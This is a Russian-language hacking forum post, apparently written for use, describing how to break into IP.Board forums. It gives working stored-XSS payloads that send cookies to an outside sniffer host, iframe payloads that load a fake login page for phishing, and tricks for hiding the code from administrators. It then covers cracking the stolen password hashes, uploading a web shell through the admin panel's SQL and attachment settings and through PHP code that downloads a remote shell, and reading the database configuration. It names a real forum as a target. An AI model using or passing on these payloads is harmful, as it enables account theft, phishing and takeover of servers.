Вообщем я нашёл способ взлома сайта а там и бд, через форум ipb с применением xss.

Что такое xss?

XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.

Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».

Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.

Работает взде где имееться тег acronym

Пример популярных серверов: http://forum.asterios.tm/

XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи)  а в сообщение отключены эти теги.

Для начала нам нужно узнать включён ли на форуме метод TRACE если же этот метод включён то нам будет намного легче получить доступ в админку.

Для начала нам нужно зарегестрировать онлайн снифер, я выбрал вот этот http://sniffer.xaknet.ru/?act=register

Зарегестрировались теперь нужно вставить ваш смайлик вот в этот код:

1)При наведение мышки на _______________...... логи отправляються на сниффер.

[acronym=[acronym= onmouseover=new/**/Image().src="http://sniffer.xaknet.ru/smiles/img__396.gif?"+document.cookie; ]]______________________________________________________________________________
[/acronym][/acronym]

2)Этот код автоматически (если даже мышку не навели) отправляет лог на снифф НО! Работает только в Oper'e !

[/acronym]
[acronym=[acronym= style=background:url('//') onerror=new/**/Image().src="http://sniffer.xaknet.ru/smiles/img__396.gif?"+document.cookie; ]][/acronym][/acronym]

В данном случае http://sniffer.xaknet.ru/smiles/img__396.gif моя ссылка на снифер, поэтому заходим в снифер и во вкладке Promo смотрим свой адрес на картинку и вставляем в код (который выше)

Теперь идём на форум который хотим взломать и пишим новое сообщение себе для проверки
[img]http://s60.radikal.ru/i169/1001/04/496453707151.jpg[/img]

Нажимаем отправить
Смотрим своё сообщение во входящих, там будет сообщение вида '> но мы не обращаем внимание (если вы вставили второй код который выше то наведите мышку на текст __________________) и идём на наш снифер http://sniffer.xaknet.ru/
И смотрим логи
Если логов нету значит вы использовали не oper'y а ie(internet explorer, или firefox и т.п.)

Если в логах есть pass_hash значит trace включён.

[img]http://s006.radikal.ru/i214/1001/81/36faefe46838.jpg[/img]

Тогда мы делаем так:
1) Идём в профиль и нажимаем Изменить подпись
2) Вставляем ваш код который вы тестировали
3) Пишим в лс админу сайта (Лучше главному админу) пишем любое сообщение.Внимание! Если вы вставили код в подпись тогда вам ненужно будет вставлять код в сообщение т.к. пр ипрочтение письма будет и отображаться ваша подпись! Если же на форуме запрещены теги в подписе тогда вставляем код в сообщение и отправляем админу.(Прежде чем ставить в подпись замасккируйте чтобы ничего небыло видно в подписе об этом смотрите дальше)
4) Ждём когда админ прочитает сообщение и логи будут в вашем снифере.
5) После получения куков(логов) там будет строка pass_hash=c18c047c77589bрa989cc327509e7d5e;
18c047c77589bрa989cc327509e7d5e это и есть наш пароль только зашифрованный в md5, теперь вам нужно расшифровать его прогой  PasswordsPro или же воспользуемся онлайн сервисами расшифровки.
http://www.c0llision.net/webcrack.php
http://hashkiller.com/

После расшифровки вам будет указан пасс под которым мы будем заходить в админку, где и как залить шелл смотрите дальше.

2.1) Так же есть другой способ для кражи паролей фейком если метод TRACE выключен или же вы неможете расшифровать пароль.
Что нам потребуеться:
1) Фейк вашего форума где авторизация --
2) Хостинг куда вы будете заливать фейк ( я выбрал freehostia.com но там нужна почта в зоне .com зарегать почту можно на pochta.com)

Есть два кода:

1)Автоматические открытие фейка во фрейме (Работает только в опере!)
[acronym=[acronym= style=background:url('//') onerror=document.write("\x3Ciframe\x20src=http://l2fan-day.ru.freehostia.com/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E");document.close(); ]][/acronym][/acronym]

2) Открытие фейка при наведение на текст ________..... (Работает везде)
[acronym=[acronym= onmouseover=document.write("\x3Ciframe\x20src=http://l2fan-day.ru.freehostia.com/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E");document.close(); ]_______________________________________________________________________][/acronym][/acronym]

И так, отправляем опять же сообщение самому себе (смотрите выше) с кодом который выше (с 1 или вторым)
Читаем своё сообщение и упс вас перекинуло на фейк (Обратите внимание на адрес! Адрес неизменился!)
Теперь делаем вот такие глаза Оо и вставляем 1 или 2 код в сообщение (незабудьте скрыть его, как это сделать описано ниже)  или лучше в подпись, и отправляем админу в лс. Так же можно написать на форуме сообщение, так вы сможете собрать пароли не только админов.

И так вот например админ что то заподозрил у вас в подписе и решил проверитьподпись а там адрес фейка, и вы сразу получаете бан.
Чтобы такого небыло ваш адрес нужно закодировать, для этого идём сюда http://ha.ckers.org/xss.html
В самом низу вводим адрес фейка и нажимаем на Encode
[img]http://s003.radikal.ru/i201/1001/57/8e65cc51d176.bmp[/img]

И получаем символы что то типа этого
http://l2fan-day.ru.freehostia.com/

Теперь вставляем в код вместо адреса и у нас получаеться вот так:

[acronym=[acronym= style=background:url('//') onerror=document.write("\x3Ciframe\x20src=http://l2fan-day.ru.freehostia.com\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E");document.close(); ]][/acronym][/acronym]

[acronym=[acronym= onmouseover=document.write("\x3Ciframe\x20src=http://l2fan-day.ru.freehostia.com\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E");document.close(); ]_______________________________________________________________________][/acronym][/acronym]

А если админ увидит вот это _________________________________..... и ему покажеться эт о подозрительным, и опять посмотрит в подпись и опять получите банан, за что? За непонятный код)
Тогда мы делаем вот так:
1) Идём вот по такому адресу --
2) В опере (правка -> найти) или firefox или internet explorer нажимаем найти и вводим post2
Там будет что то вроде этого:
[img]http://s005.radikal.ru/i211/1001/57/44d2e7475b62.jpg[/img]

Это цвет подписи, то есть мы будем скрывать под цвет.

[color=#fff7ad]наш код[/color]

Где #fff7ad наш цвет
В итоге мы максимально скрыли наш код:

[*color="#fff7ad"][*size=1][acronym=[acronym= style=background:url('//') onerror=document.write("\x3Ciframe\x20src=http://l2fan-day.ru.freehostia.com\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E");document.close(); ]][/acronym][/acronym][/size*][/color*] (Уберите *  !!!)

И так вот мы зашли в админку и нам нужно залить шелл есть несколько способов чтобы залить шелл:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

-> --

шелл: http://site.ru/uploads/shell.php

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

http://site.ru/index.php?app=core&m … rea=avatar

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

http://site.ru/uploads/av-1.php3

Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.

Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода
до отображения или сохранения настройки:" пишем любой php код, например такой:
-----------------------------------------

$linky="http://сайт_с_шеллом/shell.txt"; 
$saved="/home//www/123/forum/uploads/123.php"; 
$from=fopen("$linky","r"); 
$to=fopen("$saved","w"); 
while(!feof($from)){ 
$string=fgets($from,4096); 
fputs($to,$string); 
} 
fclose($to); 
echo 'done';
fclose($from);

Веб шелл найдёте сами) google.com вам в помощь лично я юзаю
http://dump.ru/file/4110882
или
http://xaker9315.narod.ru/0001.txt

После того как вы залили шелл идёте в самый корень где сде находиться сайт и ищете конфиг где настройки подключения к бд.
На asterios xss работает только в сообщение при ответе он увидит ваш xss так что лучше не рискуйте)

Если будет возможность буду обновлять этот пост, сейчас я ищу возможность чтобы xss автоматически срабатывало в ie(internet explorer и firefox и т.п.)
P.S. Если здесь водяться крысы прошу оставить хотябы имя автора)

Баг найден мной (by z0mbie icq 204924) специально для megachiter.ru©